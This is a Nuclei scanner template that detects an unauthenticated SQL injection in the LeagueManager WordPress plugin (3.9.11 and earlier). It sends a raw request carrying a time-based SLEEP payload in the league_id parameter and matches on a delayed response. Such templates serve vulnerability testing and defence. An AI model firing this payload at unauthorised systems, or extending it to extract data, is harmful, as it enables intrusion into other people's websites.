34 lines
1.2 KiB
YAML
34 lines
1.2 KiB
YAML
id: leaguemanager-sql-injection
|
|
|
|
info:
|
|
name: LeagueManager <= 3.9.11 - SQL Injection
|
|
author: theamanrawat
|
|
severity: critical
|
|
description: |
|
|
The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/f3be48f5-ae2c-4e27-80ca-664829b8fba3
|
|
- https://wordpress.org/plugins/leaguemanager/
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
tags: wpscan,sqli,wp,wp-plugin,wordpress,leaguemanager,unauth
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
@timeout: 10s
|
|
GET /?season=1&league_id=1season=1&league_id=1'+AND+(SELECT+1909+FROM+(SELECT(SLEEP(6)))ZiBf)--+qODp&match_day=1&team_id=1&match_day=1&team_id=1 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration>=6'
|
|
- 'status_code == 200'
|
|
- 'contains(content_type, "text/html")'
|
|
- 'contains(body, "LeagueManagerAjaxL10n")'
|
|
condition: and
|
|
|
|
# digest: 4b0a00483046022100e212ee414bbf491c941f5bac4f68e99f9e38f93a235f2992247bc719a91a7a66022100f74d6a19195458235dba7e2b26e2359e9ffb5bddcb4c627597df35ff2fce94b2:922c64590222798bb761d5b6d8e72950
|